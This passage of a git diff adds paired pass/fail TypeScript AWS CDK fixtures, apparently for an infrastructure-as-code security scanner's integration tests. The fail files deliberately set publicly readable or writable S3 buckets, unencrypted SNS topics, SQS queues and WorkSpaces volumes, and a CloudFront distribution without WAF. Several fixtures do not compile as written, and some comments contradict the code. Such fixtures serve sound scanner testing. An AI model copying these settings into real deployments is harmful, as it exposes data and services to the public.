+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass2.ts
@@ -0,0 +1,24 @@
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import { Bucket, BlockPublicAccess } from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new Bucket(stack, 'MyBucket', {
+  blockPublicAccess: BlockPublicAccess.BLOCK_ACLS, // Only block public ACLs
+  versioned: true,
+  removalPolicy: cdk.RemovalPolicy.DESTROY, // NOT recommended for production code
+  autoDeleteObjects: true, // NOT recommended for production code
+});
+
+const bucket2 = new Bucket(stack, 'MyBucket', {
+  blockPublicAccess: BlockPublicAccess.BLOCK_ALL, // Only block public ACLs
+  versioned: true,
+  removalPolicy: cdk.RemovalPolicy.DESTROY, // NOT recommended for production code
+  autoDeleteObjects: true, // NOT recommended for production code
+});
+
+app.synth();
+
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass3.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass3.ts
new file mode 100644
index 00000000000..477b0f953c5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass3.ts
@@ -0,0 +1,23 @@
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new s3.CfnBucket(stack, 'MyBucket', {
+  bucketName: 'my-bucket-name', // Optional: Specify a bucket name
+  versioningConfiguration: {
+    status: 'Enabled',
+  },
+  publicAccessBlockConfiguration: {
+    blockPublicAcls: true, // Only block public ACLs
+    ignorePublicAcls: true,
+  },
+});
+
+// Add deletion policy to the bucket
+bucket.applyRemovalPolicy(cdk.RemovalPolicy.DESTROY); // NOT recommended for production code
+
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts
new file mode 100644
index 00000000000..dee086f3e1c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts
@@ -0,0 +1,8 @@
+// FINDING
+import { Bucket } from '@aws-cdk/aws-s3';
+
+// SINK
+// SINK: Vulnerability found due to S3 bucket missing block public policy
+new Bucket(stack, 'MyBucket', {
+    publicReadAccess: true, // This should be 'false' to block public policy
+});
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts
new file mode 100644
index 00000000000..27861a97390
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts
@@ -0,0 +1,11 @@
+// FINDING
+import { Bucket } from '@aws-cdk/aws-s3';
+
+// SINK
+// SINK: Vulnerability found due to S3 bucket missing block public policy
+new Bucket(stack, 'MyBucket', {
+    publicReadAccess: false, // This should be 'false' to block public policy
+});
+new Bucket(stack, 'MyBucket', {
+    random_param: false,
+});
diff --git a/cdk_integration_tests/src/typescript/S3PublicACLRead/fail__3__.ts b/cdk_integration_tests/src/typescript/S3PublicACLRead/fail__3__.ts
new file mode 100644
index 00000000000..701e733dd44
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3PublicACLRead/fail__3__.ts
@@ -0,0 +1,34 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+class S3BucketExampleStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        // Bucket with PUBLIC_READ access - Match
+        new s3.Bucket(this, 'MyPublicReadBucket', {
+            accessControl: s3.BucketAccessControl.PUBLIC_READ,
+        });
+
+        new s3.Bucket(this, 'MyPrivateReadBucket');
+
+        // Bucket with PUBLIC_READ_WRITE access
+        new s3.Bucket(this, 'MyPublicReadWriteBucket', {
+            accessControl: s3.BucketAccessControl.PUBLIC_READ_WRITE,
+        });
+
+        // Bucket with publicReadAccess set to true
+        new s3.Bucket(this, 'MyPublicReadAccessBucket', {
+            publicReadAccess: true,
+        });
+
+        // Bucket with publicReadAccess set to true
+        new s3.Bucket(this, 'MyPublicReadAccessBucket', {
+            publicReadAccess: false,
+        });
+    }
+}
+
+const app = new App();
+new S3BucketExampleStack(app, 'S3BucketExampleStack');
diff --git a/cdk_integration_tests/src/typescript/S3PublicACLRead/pass.ts b/cdk_integration_tests/src/typescript/S3PublicACLRead/pass.ts
new file mode 100644
index 00000000000..5355079040b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3PublicACLRead/pass.ts
@@ -0,0 +1,30 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+class S3BucketExampleStack extends Stack {
+    constructor(scope: Construct, id: string, props?: StackProps) {
+        super(scope, id, props);
+
+        // Bucket with PUBLIC_READ access - Match
+        new s3.Bucket(this, 'MyPublicReadBucket');
+
+        new s3.Bucket(this, 'MyPrivateReadBucket');
+
+        // Bucket with PUBLIC_READ_WRITE access
+        new s3.Bucket(this, 'MyPublicReadWriteBucket', {
+            accessControl: s3.BucketAccessControl.Private,
+        });
+
+        // Bucket with publicReadAccess set to true
+        new s3.Bucket(this, 'MyPublicReadAccessBucket', {});
+
+        // Bucket with publicReadAccess set to true
+        new s3.Bucket(this, 'MyPublicReadAccessBucket', {
+            publicReadAccess: false,
+        });
+    }
+}
+
+const app = new App();
+new S3BucketExampleStack(app, 'S3BucketExampleStack');
diff --git a/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/fail__2__.ts b/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/fail__2__.ts
new file mode 100644
index 00000000000..15cf72c1840
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/fail__2__.ts
@@ -0,0 +1,43 @@
+import * as cdk from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+class S3BucketWithPublicAccessStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+
+        new s3.Bucket(this, 'aaa', {
+            versioned: false, // You can enable versioning if needed
+            removalPolicy: cdk.RemovalPolicy.DESTROY, // Change this according to your retention policy
+            blockPublicAccess: new s3.BlockPublicAccess({
+                blockPublicAcls: true,
+                blockPublicPolicy: true,
+                ignorePublicAcls: true,
+                restrictPublicBuckets: false,
+            }),
+        });
+    }
+}
+
+class PublicS3BucketStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+
+        new s3.CfnBucket(this, 'PublicBucket', {
+            versioningConfiguration: {
+                status: 'Suspended', // You can enable versioning if needed
+            },
+            publicAccessBlockConfiguration: {
+                blockPublicAcls: true,
+                blockPublicPolicy: true,
+                ignorePublicAcls: true,
+                restrictPublicBuckets: false,
+            },
+        });
+    }
+}
+
+const app = new cdk.App();
+new S3BucketWithPublicAccessStack(app, 'S3BucketWithPublicAccessStack');
+new PublicS3BucketStack(app, 'PublicS3BucketStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/pass.ts b/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/pass.ts
new file mode 100644
index 00000000000..6f820166fc7
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/pass.ts
@@ -0,0 +1,38 @@
+import * as cdk from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+class S3BucketWithPublicAccessStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+
+        new s3.Bucket(this, 'aaa', {
+            versioned: false, // You can enable versioning if needed
+            removalPolicy: cdk.RemovalPolicy.DESTROY, // Change this according to your retention policy
+            blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL, // Enforce all public access restrictions
+        });
+    }
+}
+
+class PublicS3BucketStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+
+        new s3.CfnBucket(this, 'PublicBucket', {
+            versioningConfiguration: {
+                status: 'Suspended', // You can enable versioning if needed
+            },
+            publicAccessBlockConfiguration: {
+                blockPublicAcls: true,
+                blockPublicPolicy: true,
+                ignorePublicAcls: true,
+                restrictPublicBuckets: true,
+      },
+    });
+  }
+}
+
+const app = new cdk.App();
+new S3BucketWithPublicAccessStack(app, 'S3BucketWithPublicAccessStack');
+new PublicS3BucketStack(app, 'PublicS3BucketStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/SNSTopicEncryption/fail.ts b/cdk_integration_tests/src/typescript/SNSTopicEncryption/fail.ts
new file mode 100644
index 00000000000..9d3d2192270
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SNSTopicEncryption/fail.ts
@@ -0,0 +1,17 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as sns from 'aws-cdk-lib/aws-sns';
+import { Construct } from 'constructs';
+
+class MyStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    new sns.Topic(this, 'Topic', {
+      topicName: 'my-topic',
+    });
+  }
+}
+
+const app = new App();
+new MyStack(app, 'MyStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/SNSTopicEncryption/pass.ts b/cdk_integration_tests/src/typescript/SNSTopicEncryption/pass.ts
new file mode 100644
index 00000000000..7fb053f05a3
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SNSTopicEncryption/pass.ts
@@ -0,0 +1,23 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as sns from 'aws-cdk-lib/aws-sns';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import { Construct } from 'constructs';
+
+class MyStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Create a new KMS Key
+    const key = new kms.Key(this, 'MyKey');
+
+    // Create a new SNS Topic using the KMS Key for encryption
+    new sns.Topic(this, 'Topic', {
+      topicName: 'my-topic',
+      masterKey: key,
+    });
+  }
+}
+
+const app = new App();
+new MyStack(app, 'MyStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/SQSQueueEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/SQSQueueEncryption/fail__2__.ts
new file mode 100644
index 00000000000..26cf0b84688
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SQSQueueEncryption/fail__2__.ts
@@ -0,0 +1,33 @@
+import { App, Stack } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import * as sqs from 'aws-cdk-lib/aws-sqs';
+
+class SqsQueueWithKmsKeyStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    new sqs.Queue(this, "MySqsQueue", {
+      encryption: sqs.QueueEncryption.KMS,
+      visibilityTimeout: cdk.Duration.seconds(300) // Other properties for the queue
+    });
+  }
+}
+
+const app = new App();
+new SqsQueueWithKmsKeyStack(app, "SqsQueueWithKmsKeyStack");
+app.synth();
+
+class SqsQueueWithKmsKeyIdStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    var mySqs = new sqs.CfnQueue(this, "MySqsQueue", {
+      visibilityTimeout: 300  // Other properties for the queue
+      // Specify the KMS key ID if needed here, e.g., kmsMasterKeyId: 'alias/aws/sqs'
+    });
+  }
+}
+
+const app2 = new App();
+new SqsQueueWithKmsKeyIdStack(app2, "SqsQueueWithKmsKeyIdStack");
+app2.synth();
diff --git a/cdk_integration_tests/src/typescript/SQSQueueEncryption/pass.ts b/cdk_integration_tests/src/typescript/SQSQueueEncryption/pass.ts
new file mode 100644
index 00000000000..2a2e7416744
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SQSQueueEncryption/pass.ts
@@ -0,0 +1,50 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as sqs from 'aws-cdk-lib/aws-sqs';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import * as cfn from 'aws-cdk-lib/aws-cloudformation';
+import { Construct } from 'constructs';
+
+class SqsQueueWithKmsKeyStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Create a KMS key for encryption
+    const kmsKey = new kms.Key(this, 'MyKmsKey', {
+      enableKeyRotation: true,
+    });
+
+    // Create an SQS queue with KMS encryption
+    new sqs.Queue(this, 'MySqsQueue', {
+      encryption: sqs.QueueEncryption.KMS,
+      encryptionMasterKey: kmsKey,
+      visibilityTimeout: cdk.Duration.seconds(300), // Other properties for the queue
+    });
+  }
+}
+
+const app = new App();
+new SqsQueueWithKmsKeyStack(app, 'SqsQueueWithKmsKeyStack');
+app.synth();
+
+
+class SqsQueueWithKmsKeyIdStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define a custom KMS key
+    const kmsKey = new cfn.CfnCustomResource(this, 'MyKmsKeyResource', {
+      serviceToken: 'arn:aws:lambda:<your-region>:<your-account>:function/<your-lambda-function>',
+      // Add other properties as needed
+    });
+
+    // Define an SQS queue with a specific KmsMasterKeyId
+    new sqs.CfnQueue(this, 'MySqsQueue', {
+      kmsMasterKeyId: kmsKey.getAtt('KmsKeyId').toString(),
+      visibilityTimeout: 300, // Other properties for the queue
+    });
+  }
+}
+
+const app2 = new App();
+new SqsQueueWithKmsKeyIdStack(app2, 'SqsQueueWithKmsKeyIdStack');
+app2.synth();
diff --git a/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/fail__2__.ts b/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/fail__2__.ts
new file mode 100644
index 00000000000..3fb36259761
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/fail__2__.ts
@@ -0,0 +1,32 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as secretsmanager from 'aws-cdk-lib/aws-secretsmanager';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import { Construct } from 'constructs';
+
+class MySecretsStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define a SecretsManager secret with KMS key ID
+    const mySecret = new secretsmanager.Secret(this, 'MySecret', {
+      secretName: 'MySecretName',
+      encryptionKey: kms.Key.fromKeyArn(this, 'MyKmsKey', 'arn:aws:kms:REGION:ACCOUNT_ID:key/aws/KMS_KEY_ID'),
+    });
+  }
+}
+
+class MySecretsStack2 extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define a SecretsManager secret without specifying KMS key ID
+    const mySecret = new secretsmanager.Secret(this, 'MySecret', {
+      secretName: 'MySecretName',
+    });
+  }
+}
+
+const app = new App();
+new MySecretsStack(app, "MySecretsStack");
+new MySecretsStack2(app, "MySecretsStack2");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/pass.ts b/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/pass.ts
new file mode 100644
index 00000000000..23a67584197
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SecretManagerSecretEncrypted/pass.ts
@@ -0,0 +1,21 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as secretsmanager from 'aws-cdk-lib/aws-secretsmanager';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import { Construct } from 'constructs';
+
+class MySecretsStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define a SecretsManager secret with KMS key ID
+    const mySecret = new secretsmanager.Secret(this, 'MySecret', {
+      secretName: 'MySecretName',
+      encryptionKey: kms.Key.fromKeyArn(this, 'MyKmsKey', 'arn:aws:kms:REGION:ACCOUNT_ID:key/KMS_KEY_ID'),
+    });
+  }
+}
+
+
+const app = new App();
+new MySecretsStack(app, "MySecretsStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/fail__4__.ts b/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/fail__4__.ts
new file mode 100644
index 00000000000..6380fdf361b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/fail__4__.ts
@@ -0,0 +1,83 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Construct } from 'constructs';
+
+class MySecurityGroupStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define EC2 Security Group with Ingress
+    const securityGroup = new ec2.CfnSecurityGroup(this, 'MySecurityGroup', {
+      groupDescription: 'My security group',
+      securityGroupIngress: [
+        {
+          description: 'Allow HTTP inbound',
+          ipProtocol: 'tcp',
+          fromPort: 80,
+          toPort: 80,
+          cidrIp: '0.0.0.0/0',
+        },
+      ],
+      // Other properties for your Security Group
+    });
+  }
+}
+
+class MySecurityGroupEgressStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define EC2 Security Group with Egress
+    const securityGroupEgress = new ec2.CfnSecurityGroup(this, 'MySecurityGroup', {
+      groupDescription: 'My security group',
+      securityGroupEgress: [
+        {
+          description: 'Allow HTTP outbound',
+          ipProtocol: 'tcp',
+          fromPort: 80,
+          toPort: 80,
+          cidrIp: '0.0.0.0/0',
+        },
+      ],
+      // Other properties for your Security Group
+    });
+  }
+}
+
+class MySecurityGroupIngressStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define EC2 Security Group Ingress
+    new ec2.CfnSecurityGroupIngress(this, 'MySecurityGroupIngress', {
+      groupId: 'your-security-group-id', // Replace with your Security Group ID
+      ipProtocol: 'tcp',
+      fromPort: 80,
+      toPort: 80,
+      cidrIp: '0.0.0.0/0',
+      // Other properties for your Security Group Ingress
+    });
+  }
+}
+
+class MySecurityGroupEgressStack2 extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define EC2 Security Group Egress
+    new ec2.CfnSecurityGroupEgress(this, 'MySecurityGroupEgress', {
+      groupId: 'your-security-group-id', // Replace with your Security Group ID
+      ipProtocol: 'tcp',
+      fromPort: 80,
+      toPort: 80,
+      cidrIp: '0.0.0.0/0',
+      // Other properties for your Security Group Egress
+    });
+  }
+}
+
+const app = new App();
+new MySecurityGroupStack(app, "MySecurityGroupStack");
+new MySecurityGroupIngressStack(app, "MySecurityGroupIngressStack");
+new MySecurityGroupEgressStack(app, "MySecurityGroupEgressStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/pass.ts b/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/pass.ts
new file mode 100644
index 00000000000..1262c9fdb11
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SecurityGroupRuleDescription/pass.ts
@@ -0,0 +1,86 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Construct } from 'constructs';
+
+class MySecurityGroupStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define EC2 Security Group with Ingress Rules
+    new ec2.CfnSecurityGroup(this, 'MySecurityGroup', {
+      groupDescription: 'My security group',
+      securityGroupIngress: [
+        {
+          description: 'True',
+          ipProtocol: 'tcp',
+          fromPort: 80,
+          toPort: 80,
+          cidrIp: '0.0.0.0/0',
+        },
+      ],
+      // Other properties for your Security Group
+    });
+  }
+}
+
+class MySecurityGroupEgressStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define EC2 Security Group with Egress Rules
+    new ec2.CfnSecurityGroup(this, 'MySecurityGroupEgress', {
+      groupDescription: 'My security group',
+      securityGroupEgress: [
+        {
+          description: 'True',
+          ipProtocol: 'tcp',
+          fromPort: 80,
+          toPort: 80,
+          cidrIp: '0.0.0.0/0',
+        },
+      ],
+      // Other properties for your Security Group
+    });
+  }
+}
+
+class MySecurityGroupIngressStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define EC2 Security Group Ingress
+    new ec2.CfnSecurityGroupIngress(this, 'MySecurityGroupIngress', {
+      groupId: 'your-security-group-id', // Replace with your Security Group ID
+      ipProtocol: 'tcp',
+      fromPort: 80,
+      toPort: 80,
+      cidrIp: '0.0.0.0/0',
+      description: 'abc',
+      // Other properties for your Security Group Ingress
+    });
+  }
+}
+
+class MySecurityGroupEgressStack2 extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define EC2 Security Group Egress
+    new ec2.CfnSecurityGroupEgress(this, 'MySecurityGroupEgress', {
+      groupId: 'your-security-group-id', // Replace with your Security Group ID
+      ipProtocol: 'tcp',
+      fromPort: 80,
+      toPort: 80,
+      cidrIp: '0.0.0.0/0',
+      description: 'abc',
+      // Other properties for your Security Group Egress
+    });
+  }
+}
+
+const app = new App();
+new MySecurityGroupStack(app, "MySecurityGroupStack");
+new MySecurityGroupEgressStack(app, "MySecurityGroupEgressStack");
+new MySecurityGroupIngressStack(app, "MySecurityGroupIngressStack");
+new MySecurityGroupEgressStack2(app, "MySecurityGroupEgressStack2");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/TransferServerIsPublic/fail__1__.ts b/cdk_integration_tests/src/typescript/TransferServerIsPublic/fail__1__.ts
new file mode 100644
index 00000000000..968a053b179
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/TransferServerIsPublic/fail__1__.ts
@@ -0,0 +1,19 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as transfer from 'aws-cdk-lib/aws-transfer';
+import { Construct } from 'constructs';
+
+class MyTransferServerStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define Transfer Server with EndpointType set to a custom value
+    new transfer.CfnServer(this, 'MyTransferServer', {
+      endpointType: 'abc', // Replace 'abc' with your endpoint type
+      // Other properties as needed for your Transfer Server
+    });
+  }
+}
+
+const app = new App();
+new MyTransferServerStack(app, "MyTransferServerStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/TransferServerIsPublic/pass.ts b/cdk_integration_tests/src/typescript/TransferServerIsPublic/pass.ts
new file mode 100644
index 00000000000..0996be68464
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/TransferServerIsPublic/pass.ts
@@ -0,0 +1,32 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as transfer from 'aws-cdk-lib/aws-transfer';
+import { Construct } from 'constructs';
+
+class MyTransferServerStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define Transfer Server with EndpointType set to VPC
+    new transfer.CfnServer(this, 'MyTransferServer', {
+      endpointType: 'VPC',
+      // Other properties as needed for your Transfer Server
+    });
+  }
+}
+
+class MyTransferServerStack2 extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define Transfer Server with EndpointType set to VPC_ENDPOINT
+    new transfer.CfnServer(this, 'MyTransferServer2', {
+      endpointType: 'VPC_ENDPOINT',
+      // Other properties as needed for your Transfer Server
+    });
+  }
+}
+
+const app = new App();
+new MyTransferServerStack(app, "MyTransferServerStack");
+new MyTransferServerStack2(app, "MyTransferServerStack2");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/fail__2__.ts b/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/fail__2__.ts
new file mode 100644
index 00000000000..2d99ed84e78
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/fail__2__.ts
@@ -0,0 +1,20 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Construct } from 'constructs';
+
+class MyVpcEndpointServiceStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define VPC Endpoint Service with acceptance not required
+    var x = new ec2.CfnVPCEndpointService(this, 'MyVPCEndpointService');
+
+    const y = new ec2.CfnVPCEndpointService(this, 'MyVPCEndpointService', {
+          acceptanceRequired: false,
+    });
+  }
+}
+
+const app = new App();
+new MyVpcEndpointServiceStack(app, "MyVpcEndpointServiceStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/pass.ts b/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/pass.ts
new file mode 100644
index 00000000000..05c335bdfe0
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/VPCEndpointAcceptanceConfigured/pass.ts
@@ -0,0 +1,19 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Construct } from 'constructs';
+
+class MyVpcEndpointServiceStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Define VPC Endpoint Service with acceptance not required
+    new ec2.CfnVPCEndpointService(this, 'MyVPCEndpointService', {
+      acceptanceRequired: true,
+      // Other properties for your VPC Endpoint Service
+    });
+  }
+}
+
+const app = new App();
+new MyVpcEndpointServiceStack(app, "MyVpcEndpointServiceStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WAFEnabled/fail__1__.ts b/cdk_integration_tests/src/typescript/WAFEnabled/fail__1__.ts
new file mode 100644
index 00000000000..c5355a72efb
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WAFEnabled/fail__1__.ts
@@ -0,0 +1,30 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import { Construct } from 'constructs';
+
+class CloudFrontDistributionStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Create a CloudFront distribution
+    new cloudfront.CfnDistribution(this, 'MyCloudFrontDistribution', {
+      distributionConfig: {
+        defaultCacheBehavior: {
+          // Configure your cache behavior as needed
+          viewerProtocolPolicy: 'allow-all', // Example configuration
+          targetOriginId: 'myTargetOrigin', // Example configuration, needs to match an origin
+          forwardedValues: {
+            queryString: true,
+            cookies: { forward: 'none' },
+          },
+        },
+        enabled: true,
+        // Other distributionConfig properties as needed
+      },
+    });
+  }
+}
+
+const app = new App();
+new CloudFrontDistributionStack(app, "CloudFrontDistributionStack");
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WAFEnabled/pass.ts b/cdk_integration_tests/src/typescript/WAFEnabled/pass.ts
new file mode 100644
index 00000000000..39e0cfb29fd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WAFEnabled/pass.ts
@@ -0,0 +1,45 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as wafv2 from 'aws-cdk-lib/aws-wafv2';
+import { Construct } from 'constructs';
+
+class CloudFrontDistributionStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Create a WebACL
+    const webAcl = new wafv2.CfnWebACL(this, 'MyWebACL', {
+      defaultAction: { allow: {} },
+      scope: 'CLOUDFRONT',
+      visibilityConfig: {
+        cloudWatchMetricsEnabled: true,
+        metricName: 'webAclMetric',
+        sampledRequestsEnabled: true,
+      },
+      // Configure your WebACL as needed
+      rules: [],
+    });
+
+    // Create a CloudFront distribution
+    const distribution = new cloudfront.CfnDistribution(this, 'MyCloudFrontDistribution', {
+      distributionConfig: {
+        defaultCacheBehavior: {
+          // Configure your cache behavior as needed
+          viewerProtocolPolicy: 'allow-all', // Example configuration
+          targetOriginId: 'myTargetOrigin', // Example configuration, needs to match an origin
+          forwardedValues: {
+            queryString: false,
+            cookies: { forward: 'none' },
+          },
+        },
+        enabled: true,
+        webAclId: webAcl.attrArn, // Set the WebACL association
+        // Other distributionConfig properties as needed
+      },
+    });
+  }
+}
+
+const app = new App();
+new CloudFrontDistributionStack(app, 'CloudFrontDistributionStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/fail__1__.ts b/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/fail__1__.ts
new file mode 100644
index 00000000000..8a0c1239680
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/WorkspaceRootVolumeEncrypted/fail__1__.ts
@@ -0,0 +1,27 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as workspaces from 'aws-cdk-lib/aws-workspaces';
+import { Construct } from 'constructs';
+
+class WorkSpacesStack extends Stack {
+  constructor(scope: Construct, id: string, props?: {}) {
+    super(scope, id, props);
+
+    // Note: The creation of a WorkSpaces directory as depicted in the Python code isn't directly supported through AWS CDK as of my last update.
+    // Typically, you would use an existing directory (like an AD Connector or a Simple AD).
+    // However, let's assume we're associating the workspace with an existing directory for this example.
+
+    // Create a WorkSpaces workspace with root volume encryption enabled
+    new workspaces.CfnWorkspace(this, 'MyWorkspace', {
+      directoryId: 'your-directory-id', // Replace with your actual directory ID
+      userName: 'my-user',
+      bundleId: 'wsb-12345678', // Replace with your actual bundle ID
+      rootVolumeEncryptionEnabled: false,
+      userVolumeEncryptionEnabled: false, // Set to true if you want user volume encryption
+      // Workspace properties need to be defined here, if necessary.
+    });
+  }
+}
+
